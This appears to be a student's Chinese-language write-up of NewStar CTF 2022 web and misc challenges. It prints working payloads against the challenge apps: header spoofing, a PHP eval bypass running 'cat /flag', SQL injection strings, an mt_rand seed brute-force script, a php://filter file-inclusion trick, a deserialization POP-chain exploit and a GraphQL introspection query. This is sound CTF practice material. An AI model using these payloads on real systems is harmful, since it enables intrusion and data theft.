2022New Star CTF

大二菜鸡web手凑凑热闹

web第一周

HTTP

Please `GET` me your `name`,I will tell you more things.

name在cookie里

GET /?name=guest HTTP/1.1

Hello,guest. Please `POST` me the `key` Again.But Where is the key?

上一步重放得到key

改cookie和key，别忘了加上name，得到flag

Head?Header!

Must Use `CTF` Brower!

改UA头

User-Agent: CTF

Must From `ctf.com`

改referer

referer:ctf.com

Only Local User Can Get Flag

改XFF

X-Forwarded-For:127.0.0.1

得到flag

You Are Good,This is your flag: flag{2be4e45f-3274-4b90-b072-1458c040ba7b} 

我真的会谢

访问

robots.txt   www.zip    .index.php.swp

NotPHP

 <?php
error_reporting(0);
highlight_file(__FILE__);
if(file_get_contents($_GET['data']) == "Welcome to CTF"){
    if(md5($_GET['key1']) === md5($_GET['key2']) && $_GET['key1'] !== $_GET['key2']){
        if(!is_numeric($_POST['num']) && intval($_POST['num']) == 2077){
            echo "Hack Me";
            eval("#".$_GET['cmd']);
        }else{
            die("Number error!");
        }
    }else{
        die("Wrong Key!");
    }
}else{
    die("Pass it!");
}

GET:   data=data:text/plain,Welcome to CTF&key1[]=1&key2[]=2&cmd=?><?=system('cat /flag');
POST:  num=2077d

Word-For-You

一开始以为是时间盲注，用脚本跑了三天，没找到flag。后来才知道是万能密码。

1' or '1'='1

web第二周

Word-For-You(2 Gen)

哇哇哇，我把查询界面改了，现在你们不能从数据库
中拿到东西了吧哈哈（不过为了调试的代码似乎忘记删除了

报错注入，就是查flag有点麻烦，显示不全

1' and updatexml(1,concat(0x7e,(select substr(group_concat(text),156,200)from wfy.wfy_comments),0x7e),3) or '

IncludeOne

文件包含漏洞系列第一题，也不知道是不是真的随机？ 
出题人丢给你了一个工具：https://www.openwall.com/php_mt_seed/

伪随机数漏洞，下载工具后爆破出seed

第一次使用工具，进入目录后，使用make命令，生成 php_mt_seed文件以后就不用输入了。
使用./php_mt_seed + 随机数即可。

<?php
highlight_file(__FILE__);
error_reporting(0);
include("seed.php");
//mt_srand(*********);
echo "Hint: ".mt_rand()."<br>";
if(isset($_POST['guess']) && md5($_POST['guess']) === md5(mt_rand())){
    if(!preg_match("/base|\.\./i",$_GET['file']) && preg_match("/NewStar/i",$_GET['file']) && isset($_GET['file'])){
        //flag in `flag.php`
        include($_GET['file']);
    }else{
        echo "Baby Hacker?";
    }
}else{
    echo "No Hacker!";
} Hint: 1219893521
No Hacker!

比如我的是1219893521

通过banner得到php版本为

7.3.15

选择种子，我的是1145146.

构造

<?php
mt_srand(1145146);
$j=0;
echo "[";
for($j=0;$j<100;$j++){
    echo(mt_rand());
    echo ",";
}
echo "]";

生成一个随机数字典。

exp:

#Author:ArushArk
#python Version:3.8

import requests
import time

dic=[1219893521,1202031004,1198284468,286494712,349108173,1809608970,1296391305,1584324323,311687746,754807714,1378740435,1240698142,850902888,448566404,1361733834,1778856200,1988406778,1495264972,1903272977,58703413,455580500,1994516472,816312968,994125629,51000526,1676697449,2041901805,885667731,1975663876,734568242,1323724304,514265464,236330101,663707652,1977098975,1690359952,521724654,1817388172,1695731145,1225295724,721542804,254967530,1028756011,722379886,335504268,2129052130,518286441,1145042458,531287820,453239803,884208358,1803552100,1229893025,392415361,285866846,2016666724,1558579835,737190787,1159720158,1605504365,1695906080,1583216827,1642926236,2093852408,406828797,1052602660,1042379469,559390831,254364212,1601070263,277797425,668692328,92642236,645983585,1529397220,1149456801,647566221,1531730989,593862593,2083289232,841560123,1605162447,844412911,1699087969,282286477,1626489409,608251064,1641062602,726736835,1915814566,804749745,602578647,977805082,1152809971,1501425859,1703850369,601482747,1945550466,413084764,1927092530,]
url = "http://adc0e541-3e32-4478-9a63-50bd9bc98866.node4.buuoj.cn:81/"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://adc0e541-3e32-4478-9a63-50bd9bc98866.node4.buuoj.cn:81", "Connection": "close", "Referer": "http://adc0e541-3e32-4478-9a63-50bd9bc98866.node4.buuoj.cn:81/", "Upgrade-Insecure-Requests": "1"}

for i in dic:
	data = {"guess": str(i)}
	re=requests.post(url, headers=headers, data=data)
	time.sleep(1)
	if "1219893521<br>Baby" in re.text:
		print(i)
		break

爆破出当前题目的伪随机数。

构造payload：

GET:?file=php://filter/read=convert.iconv.UCS-2LE.UCS-2BE/NewStar/resource=flag.php
POST:guess=1202031004

base用convert.iconv.UCS-2LE.UCS-2BE绕过，NewStar直接在中间加一个，不影响

还需要一步解码

<?php
$str = "?<hp p//lfga3{fbe13f-3166c4-04-e58cfc-664c98a4a9}0";
echo iconv('UCS-2BE', 'UCS-2LE', $str);
?>

即可得到

<?php //flag{3bf1ef33-61c6-440e-85fc-c66c4894a9a0}[Finished in 0.3s]

UnserializeOne

PHP反序列化漏洞系列第一题

clone当调用clone方法时触发

<?php
error_reporting(0);
highlight_file(__FILE__);
#Something useful for you : https://zhuanlan.zhihu.com/p/377676274
class Start{
    public $name;
    protected $func;

    public function __destruct()
    {
        echo "Welcome to NewStarCTF, ".$this->name;
    }

    public function __isset($var)
    {
        ($this->func)();
    }
}

class Sec{
    private $obj;
    private $var;

    public function __toString()
    {
        $this->obj->check($this->var);
        return "CTFers";
    }

    public function __invoke()
    {
        echo file_get_contents('/flag');
    }
}

class Easy{
    public $cla;

    public function __call($fun, $var)
    {
        $this->cla = clone $var[0];
    }
}

class eeee{
    public $obj;

    public function __clone()
    {
        if(isset($this->obj->cmd)){
            echo "success";
        }
    }
}

if(isset($_POST['pop'])){
    unserialize($_POST['pop']);
}

pop链

start __destruct --->  sec __toString --->  easy __call  --->  eeee __clone   --->   Start __isset  --->  Sec  __invoke

exp

<?php
class Start{
    public $name;
    public $func;

    public function __destruct()
    {
        echo "Welcome to NewStarCTF, ".$this->name;
    }

    public function __isset($var)
    {
        ($this->func)();
    }
}

class Sec{
    public $obj;
    public $var;

    public function __toString()
    {
        $this->obj->check($this->var);
        return "CTFers";
    }

    public function __invoke()
    {
        echo file_get_contents('/flag');
    }
}

class Easy{
    public $cla;

    public function __call($fun, $var)
    {
        $this->cla = clone $var[0];
    }
}

class eeee{
    public $obj;

    public function __clone()
    {	
        if(isset($this->obj->cmd)){
            echo "success";
        }
    }
}
$b=new Start();
$c=new Sec();
$b->name=$c;
$d=new Easy();
$c->obj=$d;
$obk=new eeee();
$haha=new Sec();
$obl=new Start();
$obl->func=$haha;
$obk->obj=$obl;
$c->var=$obk;
echo urlencode(serialize($b));

?>

pop=O%3A5%3A%22Start%22%3A2%3A%7Bs%3A4%3A%22name%22%3BO%3A3%3A%22Sec%22%3A2%3A%7Bs%3A3%3A%22obj%22%3BO%3A4%3A%22Easy%22%3A1%3A%7Bs%3A3%3A%22cla%22%3BN%3B%7Ds%3A3%3A%22var%22%3BO%3A4%3A%22eeee%22%3A1%3A%7Bs%3A3%3A%22obj%22%3BO%3A5%3A%22Start%22%3A2%3A%7Bs%3A4%3A%22name%22%3BN%3Bs%3A4%3A%22func%22%3BO%3A3%3A%22Sec%22%3A2%3A%7Bs%3A3%3A%22obj%22%3BN%3Bs%3A3%3A%22var%22%3BN%3B%7D%7D%7D%7Ds%3A4%3A%22func%22%3BN%3B%7D

ezAPI

发现www.zip

在源码里发现如下语句

isset($_POST['data']) ? $data = $_POST['data'] : $data = '{"query":"query{\nusers_user_by_pk(id:' . $id . ') {\nname\n}\n}\n", "variables":null}';

得到查询语句

{"query":"query{\nusers_user_by_pk(id:' . $id . ') {\nname\n}\n}\n", "variables":null}

传参data试了一下

id=999&data={"query":"query{\nusers_user_by_pk(id:1){\nname\n}\n}\n","variables":null}

搜索graphql得到如下payload（需要整理一下）

原文链接

{"query":"\n    query IntrospectionQuery {\n      __schema {\n        queryType { name }\n        mutationType { name }\n        subscriptionType { name }\n        types {\n          ...FullType\n        }\n        directives {\n          name\n          description\n          locations\n          args {\n            ...InputValue\n          }\n        }\n      }\n    }\n\n    fragment FullType on __Type {\n      kind\n      name\n      description\n      fields(includeDeprecated: true) {\n        name\n        description\n        args {\n          ...InputValue\n        }\n        type {\n          ...TypeRef\n        }\n        isDeprecated\n        deprecationReason\n      }\n      inputFields {\n        ...InputValue\n      }\n      interfaces {\n        ...TypeRef\n      }\n      enumValues(includeDeprecated: true) {\n        name\n        description\n        isDeprecated\n        deprecationReason\n      }\n      possibleTypes {\n        ...TypeRef\n      }\n    }\n\n    fragment InputValue on __InputValue {\n      name\n      description\n      type { ...TypeRef }\n      defaultValue\n    }\n\n    fragment TypeRef on __Type {\n      kind\n      name\n      ofType {\n        kind\n        name\n        ofType {\n          kind\n          name\n          ofType {\n            kind\n            name\n            ofType {\n              kind\n              name\n              ofType {\n                kind\n                name\n                ofType {\n                  kind\n                  name\n                  ofType {\n                    kind\n                    name\n                  }\n                }\n              }\n            }\n          }\n        }\n      }\n    }\n","variables":null}

试了一下，成功查到数据

ffffllllaaagggg_1n_h3r3.flag

接着用她的接口查flag，构造了几次发现没有id这个参数

id=9&data={"query":"query{\nffffllllaaagggg_1n_h3r3_flag{\nflag\n}\n}\n","variables":null}

misc第一周

misc也就第一周了，第二周不太想写，没有耐心，拼图和修Aztec Code太麻烦了。。（这玩意儿的纠错级别太多了，级别越高容错率越低），突然不喜欢misc了，好在也就偶尔玩玩。

Look my eyes

silenteye打开decode即可。

qsdzs_girlfriend

压缩包爆破生日得到20031201

再百度识图，搜人物名称。

奇怪的音频

SSTV，使用sstv解密工具就可以得到flag图片。

Yesec_no_drumsticks

lsb隐写，zsteg检测得到flag。

zsteg -a xx.png

EzSnake

用cheat engine，修改score即可